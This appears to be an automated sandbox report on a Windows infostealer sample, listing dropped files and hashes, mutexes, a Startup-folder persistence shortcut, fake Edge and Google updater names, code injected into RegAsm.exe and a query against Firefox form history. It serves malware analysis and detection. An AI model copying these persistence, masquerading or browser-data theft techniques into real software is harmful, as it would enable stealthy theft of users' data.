Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B43CAB0	15_2_6B43CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B492AB0	15_2_6B492AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B44A940	15_2_6B44A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B43D960	15_2_6B43D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B47B970	15_2_6B47B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B49B170	15_2_6B49B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B465190	15_2_6B465190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B482990	15_2_6B482990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B42C9A0	15_2_6B42C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B45D9B0	15_2_6B45D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B448850	15_2_6B448850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B44D850	15_2_6B44D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B46F070	15_2_6B46F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B437810	15_2_6B437810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B46B820	15_2_6B46B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B474820	15_2_6B474820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B4950C7	15_2_6B4950C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B44C0E0	15_2_6B44C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B4658E0	15_2_6B4658E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B4560A0	15_2_6B4560A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B439F00	15_2_6B439F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B467710	15_2_6B467710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B42DFE0	15_2_6B42DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B456FF0	15_2_6B456FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B4777A0	15_2_6B4777A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B444640	15_2_6B444640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B472E4E	15_2_6B472E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B449E50	15_2_6B449E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B463E50	15_2_6B463E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B496E63	15_2_6B496E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B42C670	15_2_6B42C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B475600	15_2_6B475600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B467E10	15_2_6B467E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B489E30	15_2_6B489E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B4976E3	15_2_6B4976E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B42BEF0	15_2_6B42BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B43FEF0	15_2_6B43FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B48E680	15_2_6B48E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B445E90	15_2_6B445E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B484EA0	15_2_6B484EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B43FD00	15_2_6B43FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B44ED10	15_2_6B44ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B450512	15_2_6B450512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B460DD0	15_2_6B460DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B4885F0	15_2_6B4885F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B435440	15_2_6B435440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B49545C	15_2_6B49545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B49AC00	15_2_6B49AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B465C10	15_2_6B465C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B472C10	15_2_6B472C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B49542B	15_2_6B49542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B4364C0	15_2_6B4364C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B44D4D0	15_2_6B44D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B42D4E0	15_2_6B42D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B466CF0	15_2_6B466CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B436C80	15_2_6B436C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B4834A0	15_2_6B4834A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B48C4A0	15_2_6B48C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B5D6BE0	15_2_6B5D6BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B570BA0	15_2_6B570BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B54CA70	15_2_6B54CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B57EA00	15_2_6B57EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B588A30	15_2_6B588A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B54EA80	15_2_6B54EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B508960	15_2_6B508960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B526900	15_2_6B526900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B5049F0	15_2_6B5049F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B5EC9E0	15_2_6B5EC9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B5909B0	15_2_6B5909B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B5609A0	15_2_6B5609A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B58A9A0	15_2_6B58A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B5A4840	15_2_6B5A4840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B520820	15_2_6B520820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B55A820	15_2_6B55A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B5D68E0	15_2_6B5D68E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B53EF40	15_2_6B53EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B592F70	15_2_6B592F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B610F20	15_2_6B610F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B4D6F10	15_2_6B4D6F10

Source: Joe Sandbox View	Dropped File: C:\ProgramData\CBFIIEHJDB.exe 836CE1411F26919F8FB95548D03C2F4DFD658FC525DFE21C7BE8ED65F81A5957
Source: Joe Sandbox View	Dropped File: C:\ProgramData\GHDHDBAECG.exe 0DDEBB36BEB37631DF17F68A14C90519F93BA7C200C62003527273119442E1FF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004172E0 appears 51 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6B45CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6B4694D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6B6509D0 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0053EA30 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004045C0 appears 317 times

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7928 -s 944

Source: file.exe, 00000000.00000002.1674631612.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.1675907773.00000000062B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLKSM.exe` vs file.exe
Source: file.exe, 00000000.00000000.1669932422.00000000008F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLKSM.exe6 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameLKSM.exe6 vs file.exe

Source: 596a8ed0706146e48ded9036d0de8611.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66fbfcc301a31_swws[1].exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66fbfccd837ac_vadggdsa[1].exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SYvU5mYtoLg0LBOPe0pXYHty.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: LKMService.exe.0.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: GoogleUpdater.exe.1.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: file.exe, QXV0b1NldHVwQUFB.cs	Base64 encoded string: 'qeg06s4oWUctt1k8RPhuWbV4UBxhvHDGGI9xtD0WWMrwH+RZ+lChnfAcbnvnqdKVLHS5AKTgi38='
Source: LKMService.exe.0.dr, QXV0b1NldHVwQUFB.cs	Base64 encoded string: 'qeg06s4oWUctt1k8RPhuWbV4UBxhvHDGGI9xtD0WWMrwH+RZ+lChnfAcbnvnqdKVLHS5AKTgi38='
Source: GoogleUpdater.exe.1.dr, QXV0b1NldHVwQUFB.cs	Base64 encoded string: 'qeg06s4oWUctt1k8RPhuWbV4UBxhvHDGGI9xtD0WWMrwH+RZ+lChnfAcbnvnqdKVLHS5AKTgi38='

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@91/204@24/20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 15_2_6B487030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

15_2_6B487030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 15_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

15_2_00419600

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_004327D0 CoInitializeEx,CoInitializeSecurity,CoUninitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,VariantClear,CoUninitialize,

5_2_004327D0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8739b66ba2a04fd0a320fa681982b133.lnk

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
Source: C:\Users\userCAAKKFHCFI.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7928
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\KejwopdnfWW_4
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7416

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\EdgeUpdater

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 0000000F.00000002.2344136690.000000001B5FF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2357504291.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2367713660.000000006B65F000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000001E.00000002.2577257374.0000000020588000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 0000000F.00000002.2344136690.000000001B5FF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2357504291.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2367713660.000000006B65F000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000001E.00000002.2577257374.0000000020588000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 0000000F.00000002.2344136690.000000001B5FF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2357504291.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2367713660.000000006B65F000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000001E.00000002.2577257374.0000000020588000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 0000000F.00000002.2344136690.000000001B5FF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2357504291.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2367713660.000000006B65F000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000001E.00000002.2577257374.0000000020588000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 0000001E.00000002.2577257374.0000000020588000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 0000001E.00000002.2577257374.0000000020588000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.2344136690.000000001B5FF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2357504291.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2367713660.000000006B65F000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000001E.00000002.2577257374.0000000020588000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 0000000F.00000002.2344136690.000000001B5FF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2357504291.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 0000000F.00000002.2344136690.000000001B5FF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2357504291.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2367713660.000000006B65F000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000001E.00000002.2577257374.0000000020588000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 0000001E.00000002.2577257374.0000000020588000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: RegAsm.exe, 0000000F.00000002.2344136690.000000001B5FF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2357504291.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2577257374.0000000020588000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 0000000F.00000002.2344136690.000000001B5FF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2357504291.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2577257374.0000000020588000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: RegAsm.exe, 0000001E.00000002.2538825385.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT fieldname, value FROM moz_formhistoryJ;

Source: file.exe	ReversingLabs: Detection: 21%
Source: file.exe	Virustotal: Detection: 35%

Source: RegAsm.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: RegAsm.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
